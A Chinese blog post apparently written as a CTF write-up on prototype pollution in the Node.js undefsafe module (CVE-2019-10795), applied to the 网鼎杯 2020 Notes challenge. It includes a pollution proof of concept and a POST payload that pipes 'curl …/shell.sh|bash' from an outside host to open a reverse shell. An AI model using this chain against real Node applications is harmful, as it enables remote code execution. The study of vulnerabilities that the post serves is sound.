Undefsafe 模块原型链污染(CVE-2019-10795)

已于 2023-12-28 12:15:23 修改
阅读量544 收藏 12
点赞数 10
分类专栏: 原型链污染 文章标签: 学习 web安全 安全 node.js
于 2023-12-19 11:41:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73512445/article/details/135079967
版权

文章目录

前置知识

Undefsafe相关语法

Undefsafe 是 Nodejs 的一个第三方模块,其核心为一个简单的函数,用来处理访问对象属性不存在时的报错问题。但其在低版本(< 2.0.3)中存在原型链污染漏洞,攻击者可利用该漏洞添加或修改 Object.prototype 属性。

示例如下

var a = require("undefsafe");
var object = {
    a: {
        b: {
            c: 1,
            d: [1,2,3],
            e: 'rev1ve'
        }
    }
};
console.log(object.a.b.e)

正常执行结果
在这里插入图片描述那么如果访问不存在的属性呢,修改部分代码

console.log(object.a.f.e)

那么会发现有报错,因为没有属性f
在这里插入图片描述在编程时,代码量较大时,我们可能经常会遇到类似情况,导致程序无法正常运行,发送我们最讨厌的报错。那么 undefsafe 可以帮助我们解决这个问题
在这里插入图片描述我们可以看到虽然中间出现了访问不存在属性,但是输出结果却并没有报错而是回显undefined

同时在对对象赋值时,如果目标属性存在undefsafe模块会修改属性值
在这里插入图片描述如果不存在则访问属性会在上层进行创建并赋值

漏洞分析

undefsafe 模块在小于2.0.3版本,存在原型链污染漏洞(CVE-2019-10795)

看向下面代码

var a = require("undefsafe");
var object = {
    a: {
        b: {
            c: 1,
            d: [1,2,3],
            e: 'rev1ve'
        }
    }
};
var payload = "__proto__.toString";
a(object,payload,"evilstring");
console.log(object.toString);

由于toString本身就是存在,我们通过Undefsafe将其更改成了我们想要执行的语句。也就是说当undefsafe()函数的第 2,3 个参数可控时,我们便可以污染 object 对象中的值
(即使是不存在的属性也可以污染)

例题 [网鼎杯 2020青龙组]Notes

题目给了源码

var express = require('express');
var path = require('path');
const undefsafe = require('undefsafe');
const { exec } = require('child_process');


var app = express();
class Notes {
    constructor() {
        this.owner = "whoknows";
        this.num = 0;
        this.note_list = {};
    }

    write_note(author, raw_note) {
        this.note_list[(this.num++).toString()] = {"author": author,"raw_note":raw_note};
    }

    get_note(id) {
        var r = {}
        undefsafe(r, id, undefsafe(this.note_list, id));
        return r;
    }

    edit_note(id, author, raw) {
        undefsafe(this.note_list, id + '.author', author);
        undefsafe(this.note_list, id + '.raw_note', raw);
    }

    get_all_notes() {
        return this.note_list;
    }

    remove_note(id) {
        delete this.note_list[id];
    }
}

var notes = new Notes();
notes.write_note("nobody", "this is nobody's first note");


app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'pug');

app.use(express.json());
app.use(express.urlencoded({ extended: false }));
app.use(express.static(path.join(__dirname, 'public')));


app.get('/', function(req, res, next) {
  res.render('index', { title: 'Notebook' });
});

app.route('/add_note')
    .get(function(req, res) {
        res.render('mess', {message: 'please use POST to add a note'});
    })
    .post(function(req, res) {
        let author = req.body.author;
        let raw = req.body.raw;
        if (author && raw) {
            notes.write_note(author, raw);
            res.render('mess', {message: "add note sucess"});
        } else {
            res.render('mess', {message: "did not add note"});
        }
    })

app.route('/edit_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to edit a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        let author = req.body.author;
        let enote = req.body.raw;
        if (id && author && enote) {
            notes.edit_note(id, author, enote);
            res.render('mess', {message: "edit note sucess"});
        } else {
            res.render('mess', {message: "edit note failed"});
        }
    })

app.route('/delete_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to delete a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        if (id) {
            notes.remove_note(id);
            res.render('mess', {message: "delete done"});
        } else {
            res.render('mess', {message: "delete failed"});
        }
    })

app.route('/notes')
    .get(function(req, res) {
        let q = req.query.q;
        let a_note;
        if (typeof(q) === "undefined") {
            a_note = notes.get_all_notes();
        } else {
            a_note = notes.get_note(q);
        }
        res.render('note', {list: a_note});
    })

app.route('/status')
    .get(function(req, res) {
        let commands = {
            "script-1": "uptime",
            "script-2": "free -m"
        };
        for (let index in commands) {
            exec(commands[index], {shell:'/bin/bash'}, (err, stdout, stderr) => {
                if (err) {
                    return;
                }
                console.log(`stdout: ${stdout}`);
            });
        }
        res.send('OK');
        res.end();
    })


app.use(function(req, res, next) {
  res.status(404).send('Sorry cant find that!');
});


app.use(function(err, req, res, next) {
  console.error(err.stack);
  res.status(500).send('Something broke!');
});


const port = 8080;
app.listen(port, () => console.log(`Example app listening at http://localhost:${port}`))

可以知道引入undefsafe模块,由前文可以知道是存在原型链污染漏洞(CVE-2019-10795),那么我们来分析如何利用漏洞来实现rce的。

首先看向Notes类中的edit_note方法

edit_note(id, author, raw) {
        undefsafe(this.note_list, id + '.author', author);
        undefsafe(this.note_list, id + '.raw_note', raw);
    }

发现三个参数id, author, raw均是可控的,会进行undefsafe处理
而另外一个get_note方法只有id参数是可控的

get_note(id) {
        var r = {}
        undefsafe(r, id, undefsafe(this.note_list, id));
        return r;
    }

所以我们选择的注入点是edit_note方法,然后往下看发现是/edit_note路由调用此方法

app.route('/edit_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to edit a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        let author = req.body.author;
        let enote = req.body.raw;
        if (id && author && enote) {
            notes.edit_note(id, author, enote);
            res.render('mess', {message: "edit note sucess"});
        } else {
            res.render('mess', {message: "edit note failed"});
        }
    })

那么我们只需要POST传参三个参数(具体污染可参考前置知识)
然后就是如何rce,我们在/status路由下发现会遍历commands去命令执行,所以污染其中一个即可

app.route('/status')
    .get(function(req, res) {
        let commands = {
            "script-1": "uptime",
            "script-2": "free -m"
        };
        for (let index in commands) {
            exec(commands[index], {shell:'/bin/bash'}, (err, stdout, stderr) => {
                if (err) {
                    return;
                }
                console.log(`stdout: ${stdout}`);
            });
        }
        res.send('OK');
        res.end();
    })

我用的是curl命令去访问我用花生壳映射的https服务器的反弹shell文件,首先在shell.sh文件的目录开启http服务

#我映射的是8000端口
python3 -m http.server 8000

开启监听,在/edit_notePOST传参

id=__proto__.aaa&author=curl https://5i781963p2.yicp.fun/shell.sh|bash&raw=hhh

注:污染commands.aaa,由于不存在会自动创建

看到回显Something broke!说明污染成功,然后访问/status去命令执行
反弹成功,得到flag
在这里插入图片描述

[GYCTF2020]Ez_Express
snowlyzz的博客
09-03 759
JavaScript 原型链学习
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
rh-nodejs8-nodejs-undefsafe-0.0.3-6.el7.noarch.rpm
01-03
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
undefsafe原型链&[网鼎杯 2020 青龙组]notes
Je3Z的博客
08-25 689
感觉是考原型链但还是有点不知道如何下手,呜呜呜呜呜呜。 从浅入深 Javascript 原型链原型链污染 [网鼎杯 2020 青龙组]notes var express = require('express'); var path = require('path'); const undefsafe = require('undefsafe'); const { exec } = require('child_process'); var app = express(); class Notes {
[网鼎杯 2020 青龙组]notes(Undefsafe原型链污染)
paidx0
08-30 763
[网鼎杯 2020 青龙组]notes(Undefsafe原型链污染)
网鼎杯2020 青龙组 -web
weixin_43610673的博客
05-16 1130
AreUSerialz <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $co
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
sudo-cve-2019-18634:CVE-2019-18634的概念证明
03-21
**sudo CVE-2019-18634 概念证明** sudo(Superuser DO)是Linux和Unix系统中的一个命令行工具,允许普通用户以超级用户(root)或其他用户的身份执行命令,通常用于管理系统。这个概念证明是关于CVE-2019-18634...
Rails-doubletap-RCE:使用路径遍历(CVE-2019-5418)和Ruby对象反序列化(CVE-2019-5420)的Rails 5.2.2上的RCE
02-06
使用路径遍历(CVE-2019-5418)和Ruby对象反序列化的RCE on Rails 5.2.2(CVE-2019-5420) 技术分析: CVE-2019-5418- CVE-2019-5420- //hackerone.com/reports/473888 安全部门: CVE-2019-5418- //groups....
JS原型、原型链以及原型链污染学习
最新发布
2301_79469341的博客
11-25 1481
JavaScript 的原型与原型链是语言的核心机制,决定了对象属性的继承与访问方式。通过原型链,对象可以沿着其隐式原型 (__proto__) 一层层向上查找,直至 null,从而实现动态的继承关系。虽然这一机制功能强大,但也带来了潜在的安全隐患——原型链污染。 核心知识与特性 __proto__、prototype 与 constructor __proto__ 是对象的隐式原型,指向其构造函数的显式原型 (prototype)。 prototype 是函数独有的属性,定义了实例共享的属性和方法。
CVE-2019-11477漏洞详解详玩()
TCP/IP
06-28 6400
几天前,为了备注,2019年的6月17号吧,一个Linux/FreeBSD系统的漏洞爆出,就是CVE-2019-11477,Netflix的公告为: https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md Redhat的链接为: https://access.redha...
CVE-2019-11477漏洞详解详玩
TCP/IP
08-20 9097
几天前,为了备注,2019年的6月17号吧,一个Linux/FreeBSD系统的漏洞爆出,就是CVE-2019-11477,Netflix的公告为: https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md Redhat的链接为: https://access.redha...
网鼑杯青龙组三道web题目复现
臭nana的博客
05-13 923
复现平台:https://buuoj.cn/ 参考博客:https://www.gem-love.com/websecurity/2322.html 题目:AreUSerialz 打开题目就可以看到源码 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content;
JavaScript开发中常用优秀插件,慢慢积累,会一直保持更新
weixin_34018202的博客
04-28 279
当在完成某项功能时或者想要借助一些插件来完成某些事情时,不知道该选用哪些插件,也不知道有哪些比较不错的插件,我决定,我要记录下来。。。基于npm的插件:CryptoJS:标准和安全加密算法的javascript实现。请移步官网了解。immutableJs:数据一旦创建,就不能更改的数据,对react应用带来很大的提升,JavaScript 中伟大的发明。momentJs:一个时间格式转换的插...
[网鼎杯 2020 青龙组]notes
Yang_99的博客
08-26 2077
一道原型链污染的题https://snyk.io/vuln/SNYK-JS-UNDEFSAFE-548940 undefsafe函数在2.03版本下会产生漏洞 题目源码: var express = require('express'); var path = require('path'); const undefsafe = require('undefsafe'); const { exec } = require('child_process'); var app = express(); cl
2020 网鼎杯web复现
fly夏天的博客
09-09 885
复现平台buuctf 白虎组: PicDown 本题是任意文件下载 尝试下载/proc/self/comline 得到提示 python2 app.py (原题应该是main.py这里可能是复现环境的差异) 下载app.py,代码审计 from flask import Flask, Response from flask import render_template from flask import request import os import urllib app = Flask
第二届网鼎杯(第一场:青龙组)web WriteUp
a3320315的博客
05-11 2537
学校战队总排名52,web和pwn各拿了一个一血,只能说师傅太强了,不过后来的排名有点起飞,最后半小时,直接从前十名飞出去了~~ filejava 这道题主要考察的是java的xxe漏洞,这个题目总共有两个功能,上传和下载功能,有上传和下载,我们就想到两个漏洞点,是否有任意文件上传或者任意文件下载? 经过测试确实有任意文件下载,但是任意文件上传确不存在,但是却能够为我们提供路径~~ 任意文件下载 但是我们不知道web的路径怎么办?我们还有文件上传的报错~~ 文件上传 我们可以看到报错处直接给了web
命令注入漏洞
热门推荐
liuy_uzhi的博客
07-30 1万+
1、注入:通过web程序在服务器上拼接系统命令。 2、命令注入的三个条件   3、windows下链接命令的符号:&amp;&amp;、&amp;、|、||命令拼接符号的区别 4、命令注入的攻击过程 5、渗透技巧: (1)不推荐黑名单解决漏洞;如果使用黑名单过滤了敏感命令怎么办? 命令中可以加入双引号绕过敏感命令(此时黑名单很难匹配) (2)如果不显示输出结果怎么办? ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_rev1ve

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值